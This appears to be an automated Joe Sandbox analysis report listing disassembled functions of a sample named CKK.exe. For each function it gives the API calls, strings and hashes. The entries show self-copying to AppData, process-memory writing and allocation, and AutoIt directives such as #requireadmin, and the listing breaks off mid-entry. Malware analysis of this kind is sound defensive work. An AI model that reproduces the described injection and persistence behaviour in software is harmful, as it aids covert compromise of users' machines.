                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3a40c81154fd80a507d7e0a6cde83b3b2daecc83d4be83ed20a626bf768495ee
                                          • Instruction ID: 0f2aa021962741d8a21089b66f5c351f36036ac5fd86597201046be43c65df55
                                          • Opcode Fuzzy Hash: 3a40c81154fd80a507d7e0a6cde83b3b2daecc83d4be83ed20a626bf768495ee
                                          • Instruction Fuzzy Hash: 8AF0F4325442086BC615EB78FDC5C167BEDBF84714B98A90AF24DF7541C720FC8057A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E722BE
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          • _free.LIBCMT ref: 00E722D0
                                          • _free.LIBCMT ref: 00E722E3
                                          • _free.LIBCMT ref: 00E722F4
                                          • _free.LIBCMT ref: 00E72305
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 25940cf52dd32361e562c7345c2e87eb06b88367000e52762ca273555b9b1faf
                                          • Instruction ID: e65591eb819ed53545c59c5401482ce965ab5dac436fccc7917a3d2953c789dc
                                          • Opcode Fuzzy Hash: 25940cf52dd32361e562c7345c2e87eb06b88367000e52762ca273555b9b1faf
                                          • Instruction Fuzzy Hash: 85F030704011588BC712AF64BC028897BE5F758750B07D60EF718E22B1CB750492BBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 6bbf8f66ed69c308f6845e42e128ba2d140a9d3f3db74ebb79ea42ce467da8a2
                                          • Instruction ID: b21b9a874611965ea41406fd076b523946a4e7cf33b05fcab4e5a232b6ed61ed
                                          • Opcode Fuzzy Hash: 6bbf8f66ed69c308f6845e42e128ba2d140a9d3f3db74ebb79ea42ce467da8a2
                                          • Instruction Fuzzy Hash: 2DF01430006209EFDB225F6AED18BE43B61FB003A6F548215FA25690F1C77189ADEF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E70F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __freea$_free
                                          • String ID: a/p$am/pm
                                          • API String ID: 3432400110-3206640213
                                          • Opcode ID: e1239504ff7f474e1f0f45ef7139a7fb6d2dc2386d3d4c32ebddb557d0b1aae2
                                          • Instruction ID: 79363974f0a2caa56b8139e7d365087b392a91a3c31ee3966ad40b883119d734
                                          • Opcode Fuzzy Hash: e1239504ff7f474e1f0f45ef7139a7fb6d2dc2386d3d4c32ebddb557d0b1aae2
                                          • Instruction Fuzzy Hash: C9D13331900346EADB288F6CC885BFAB7B0EF01308F25E199E90DBB651D3359D80DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E78A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?), ref: 00E78B6E
                                          • GetLastError.KERNEL32 ref: 00E78B7A
                                          • __dosmaperr.LIBCMT ref: 00E78B81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                          • String ID: .
                                          • API String ID: 2434981716-3963672497
                                          • Opcode ID: 15eaf04ec6a3e2ceca022eeca67ee18efd65f2d46f121f1461ed7202f5db236f
                                          • Instruction ID: fa8d5bb16e6b8ecbd6563aa16254f46a6b8ab2c2d574a6daa59093ced2a85889
                                          • Opcode Fuzzy Hash: 15eaf04ec6a3e2ceca022eeca67ee18efd65f2d46f121f1461ed7202f5db236f
                                          • Instruction Fuzzy Hash: 8141AC74604045AFCB249F24D989ABD3FE5DF95304F28E1AAF88CA7242DE318C03A790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000), ref: 00EAB42D
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EA2760
                                            • Part of subcall function 00EAB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000), ref: 00EAB3F8
                                            • Part of subcall function 00EAB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00EAB355
                                            • Part of subcall function 00EAB32A: OpenProcess.KERNEL32(00000438,00000000,?), ref: 00EAB365
                                            • Part of subcall function 00EAB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00EAB37B
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EA27CD
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EA281A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 534e84e9ffff583c87ed146a723acaa7708dd14a0f9f1d70a481a31a87190cc4
                                          • Instruction ID: 9a16392ed31f36d3fa3d1925896d3285d41cc600fa1069b4df2214cd7bc86278
                                          • Opcode Fuzzy Hash: 534e84e9ffff583c87ed146a723acaa7708dd14a0f9f1d70a481a31a87190cc4
                                          • Instruction Fuzzy Hash: 91412E72900218AFDB10DFA4CD45ADEBBB8EF0A700F105099FA55BB181DB707E49CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Users\user\AppData\Roaming\CKK.exe
                                          • API String ID: 2506810119-112244442
                                          • Opcode ID: 99909a11e41dea092f114fc9a71a2a78eb670fb9f7e90e00c4b6160cafd95510
                                          • Instruction ID: a57ff9def3c2e8460bba43a35f9d801641de3cc91962fa96e032715a57bebcbf
                                          • Opcode Fuzzy Hash: 99909a11e41dea092f114fc9a71a2a78eb670fb9f7e90e00c4b6160cafd95510
                                          • Instruction Fuzzy Hash: FB318071A00358AFDB25DF99D881D9EBBFCEB85310B1491AAF908E7211D6708E40DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem
                                          • String ID: 0
                                          • API String ID: 135850232-4108050209
                                          • Opcode ID: 62baf5b57b6138a21614c0291b9acc3fa58a1b2113dfbb026950c8716d1e0b2e
                                          • Instruction ID: 147338d728e213bc40fe0f33075cf6917c662c7645ebafba140564f7880a5a96
                                          • Opcode Fuzzy Hash: 62baf5b57b6138a21614c0291b9acc3fa58a1b2113dfbb026950c8716d1e0b2e
                                          • Instruction Fuzzy Hash: DD41B6312043019FDB24DF25D844B5ABBE4EF8A314F24966DF965AB2D1D770F908CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED44AA
                                          • GetWindowLongW.USER32 ref: 00ED44C7
                                          • SetWindowLongW.USER32 ref: 00ED44D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: bc4fac9f7f90270a69a0e95467595796619dfa97ee4dc6cbdc0e79c7b7ce097c
                                          • Instruction ID: f4e7309c2971d5131bac03f48c922d94844e0c3b454c94efd4aa8e64ae3f3524
                                          • Opcode Fuzzy Hash: bc4fac9f7f90270a69a0e95467595796619dfa97ee4dc6cbdc0e79c7b7ce097c
                                          • Instruction Fuzzy Hash: 92318D71210206AFDF219E38EC45BEA77A9EB18338F206716F975A22D0D770EC969750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyString
                                          • String ID: *j
                                          • API String ID: 2173805711-1845181700
                                          • Opcode ID: a82a0c5c02af5120b99e7493cd7eaac95f42710ceb1f1baa257e4d08787ff74c
                                          • Instruction ID: 1bf968b1655257d7a597c45bea22f64bf146efd910545158aa018b3ccc740453
                                          • Opcode Fuzzy Hash: a82a0c5c02af5120b99e7493cd7eaac95f42710ceb1f1baa257e4d08787ff74c
                                          • Instruction Fuzzy Hash: 7531B175704215DFCB04AFA4E8519BD77B6EF8B304B141499F8026F2A1C734E916DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EC335B: WideCharToMultiByte.KERNEL32 ref: 00EC3378
                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                          • _wcslen.LIBCMT ref: 00EC309B
                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00EC3106
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 946324512-2422070025
                                          • Opcode ID: abdadaaf70145b92187e893ae56789abfe46c910027acf83e9dc30ffcd70d2fc
                                          • Instruction ID: 82b254272116de5906a97e65622141bb0e56bbfe8f86c201051f37d155e0578a
                                          • Opcode Fuzzy Hash: abdadaaf70145b92187e893ae56789abfe46c910027acf83e9dc30ffcd70d2fc
                                          • Instruction Fuzzy Hash: 0031A33A6002019FCB10CF39D686FAA77E0EF54318F28D059E915AB392D732EE46C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00ED4705
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00ED4713
                                          • DestroyWindow.USER32 ref: 00ED471A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: f86fbbc50f7583eb00dd39209b388aaa2cbdecd44331c83bb5940f41f3d6c6d9
                                          • Instruction ID: ddad5523a81194be1017c5f5903bb85759fdb9c79842cb5d381445d90edacbf5
                                          • Opcode Fuzzy Hash: f86fbbc50f7583eb00dd39209b388aaa2cbdecd44331c83bb5940f41f3d6c6d9
                                          • Instruction Fuzzy Hash: 2D2151F5600209AFEB10DF64DCC1DA737EDEB5A3A8B14105AF610A7391CB71EC12DA60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 176396367-2734436370
                                          • Opcode ID: a00f9399df49f70daa21e45f3405acc64a11a33d7a796503f57c7384f580cd71
                                          • Instruction ID: 1d98ce326d18496520cef90a5a52cf5b25fb8acc13f31e6880b524633ef6c491
                                          • Opcode Fuzzy Hash: a00f9399df49f70daa21e45f3405acc64a11a33d7a796503f57c7384f580cd71
                                          • Instruction Fuzzy Hash: D121357264421166D331EA24AC02FBB73D8DF9A314F106426F94ABF182EB51BD52C2E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00ED3840
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00ED3850
                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00ED3876
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: a8714103e5e488eb544ed7d1e16fb96abb7eefaa25bed9419e9240bea7763c2d
                                          • Instruction ID: 7839afd483a48a3b45aff4310c0440d487b00c366db7fc36c346673ad3e0b482
                                          • Opcode Fuzzy Hash: a8714103e5e488eb544ed7d1e16fb96abb7eefaa25bed9419e9240bea7763c2d
                                          • Instruction Fuzzy Hash: 8721F272600218BFEF218F64DC41FBB376EEF89754F109116F900AB290C671DC1297A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB4A08
                                          • GetVolumeInformationW.KERNEL32 ref: 00EB4A5C
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB4AD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume
                                          • String ID: %lu
                                          • API String ID: 2507767853-685833217
                                          • Opcode ID: b16e5bb8456a00d46ba7c8458075a3fc7a8701e99b12415c07b30b1f63208282
                                          • Instruction ID: ba811b3137ca246a2fcc93e8136cba30e50e651ddfae59aad3f4bea3de6158fa
                                          • Opcode Fuzzy Hash: b16e5bb8456a00d46ba7c8458075a3fc7a8701e99b12415c07b30b1f63208282
                                          • Instruction Fuzzy Hash: BE315E71A00219AFDB10DF54C885EAABBF8EF08308F1490A5F909EB253D771ED46CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00ED424F
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00ED4264
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00ED4271
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: a909184fcf419c6ac527439e339c167a142b082150add3b0b2aee2420c7933ef
                                          • Instruction ID: 9b4af89a3c44217aead5768ed787665d8f5e42191f51c593aa2ad765b1430bac
                                          • Opcode Fuzzy Hash: a909184fcf419c6ac527439e339c167a142b082150add3b0b2aee2420c7933ef
                                          • Instruction Fuzzy Hash: 2311E371240208BFEF205E69CC06FAB3BACEF95B68F111115FA55F61E0D671D8129B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                            • Part of subcall function 00EA2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA2DC5
                                            • Part of subcall function 00EA2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA2DD6
                                            • Part of subcall function 00EA2DA7: GetCurrentThreadId.KERNEL32 ref: 00EA2DDD
                                            • Part of subcall function 00EA2DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA2DE4
                                          • GetFocus.USER32 ref: 00EA2F78
                                            • Part of subcall function 00EA2DEE: GetParent.USER32(00000000), ref: 00EA2DF9
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA2FC3
                                          • EnumChildWindows.USER32 ref: 00EA2FEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
